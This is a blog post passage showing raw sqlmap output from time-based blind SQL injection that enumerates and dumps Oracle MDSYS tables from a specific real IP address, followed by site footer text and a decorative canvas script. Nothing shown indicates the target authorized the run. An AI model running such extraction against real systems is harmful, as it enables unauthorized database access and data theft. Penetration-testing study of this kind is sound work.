[11:45:47] [INFO] resumed: SDO_LRS_METADATA_TABLE
[11:45:47] [INFO] resumed: SDO_MAPS_TABLE
[11:45:47] [INFO] resumed: SDO_PROJECTIONS
[11:45:47] [INFO] resumed: SDO_STYLES_TABLE
[11:45:47] [INFO] resumed: SDO_THEMES_TABLE
[11:45:47] [INFO] resumed: USER_CS_SRS
[11:45:47] [INFO] resumed: USER_TRANSFORM_MAP
[11:45:47] [INFO] fetching columns for table 'SDO_MAPS_TABLE' in database 'MDSYS'                                                                    
[11:45:47] [INFO] the SQL query used returns 4 entries
[11:45:47] [INFO] resumed: "SDO_OWNER","VARCHAR2"
[11:45:47] [INFO] resumed: "NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "DESCRIPTION","VARCHAR2"
[11:45:47] [INFO] resumed: "DEFINITION","CLOB"
[11:45:47] [INFO] fetching entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'                                                                    
[11:45:47] [INFO] fetching number of entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:47] [INFO] resumed: 0
[11:45:47] [WARNING] table 'SDO_MAPS_TABLE' in database 'MDSYS' appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+

[11:45:47] [INFO] table 'MDSYS.SDO_MAPS_TABLE' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv'
[11:45:47] [INFO] fetching columns for table 'CS_SRS' in database 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 6 entries
[11:45:47] [INFO] resumed: "CS_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "WKTEXT","VARCHAR2"
[11:45:47] [INFO] resumed: "CS_BOUNDS","SDO_GEOMETRY"
[11:45:47] [INFO] fetching entries for table 'CS_SRS' in database 'MDSYS'                                                                            
[11:45:47] [INFO] the SQL query used returns 1000 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
^C
[11:48:11] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:48:11] [INFO] fetching number of entries for table 'CS_SRS' in database 'MDSYS'
[11:48:11] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
[11:48:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1000
[11:49:19] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
University of Arizona
[11:55:51] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
20
[11:56:40] [ERROR] invalid character detected. retrying..
0
[11:57:00] [ERROR] invalid character detected. retrying..
0001
[11:57:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
Martian Longitude/Latitude
[12:05:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
2000001
[12:06:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
[12:07:16] [ERROR] invalid character detected. retrying..
GEOGCS [ "Mar
[12:11:45] [ERROR] invalid character detected. retrying..
tian Lon^C
[12:14:39] [WARNING] Ctrl+C detected in dumping phase                                                                                                
Database: MDSYS
Table: CS_SRS
[0 entries]
+---------+-----------+--------+----------------------------+-----------------------+-----------+
| SRID    | AUTH_SRID | WKTEXT | CS_NAME                    | AUTH_NAME             | CS_BOUNDS |
+---------+-----------+--------+----------------------------+-----------------------+-----------+
+---------+-----------+--------+----------------------------+-----------------------+-----------+

[12:14:39] [INFO] table 'MDSYS.CS_SRS' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/CS_SRS.csv'
[12:14:39] [INFO] fetching columns for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [INFO] the SQL query used returns 1 entries
[12:14:40] [INFO] fetching entries for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [INFO] fetching number of entries for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait...^X..........^C....^C                              

[12:14:46] [ERROR] user aborted

[*] shutting down at 12:14:46

root@kali-yaming:~#


posted @   疏桐  阅读(3513)  评论(0编辑  收藏  举报
编辑推荐:
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
阅读排行:
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 提示词工程——AI应用必不可少的技术
· Open-Sora 2.0 重磅开源!
· 周边上新:园子的第一款马克杯温暖上架
function e(n){ return document.getElementsByTagName(n) } function t(){ var t=e("script"),o=t.length,i=t[o-1]; return{ l:o,z:n(i,"zIndex",-1),o:n(i,"opacity",.5),c:n(i,"color","0,0,0"),n:n(i,"count",99) } } function o(){ a=m.width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth, c=m.height=window.innerHeight||document.documentElement.clientHeight||document.body.clientHeight } function i(){ r.clearRect(0,0,a,c); var n,e,t,o,m,l; s.forEach(function(i,x){ for(i.x+=i.xa,i.y+=i.ya,i.xa*=i.x>a||i.x<0?-1:1,i.ya*=i.y>c||i.y<0?-1:1,r.fillRect(i.x-.5,i.y-.5,1,1),e=x+1;e=n.max/2&&(i.x-=.03*o,i.y-=.03*m), t=(n.max-l)/n.max,r.beginPath(),r.lineWidth=t/2,r.strokeStyle="rgba("+d.c+","+(t+.2)+")",r.moveTo(i.x,i.y),r.lineTo(n.x,n.y),r.stroke())) }), x(i) } var a,c,u,m=document.createElement("canvas"), d=t(),l="c_n"+d.l,r=m.getContext("2d-disabled"), x=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame|| function(n){ window.setTimeout(n,1e3/45) }, w=Math.random,y={x:null,y:null,max:2e4};m.id=l,m.style.cssText="position:fixed;top:0;left:0;z-index:"+d.z+";opacity:"+d.o,e("body")[0].appendChild(m),o(),window.onresize=o, window.onmousemove=function(n){ n=n||window.event,y.x=n.clientX,y.y=n.clientY }, window.onmouseout=function(){ y.x=null,y.y=null }; for(var s=[],f=0;d.n>f;f++){ var h=w()*a,g=w()*c,v=2*w()-1,p=2*w()-1;s.push({x:h,y:g,xa:v,ya:p,max:6e3}) } u=s.concat([y]), setTimeout(function(){i()},100) }();
点击右上角即可分享
微信分享提示
AI IDE Trae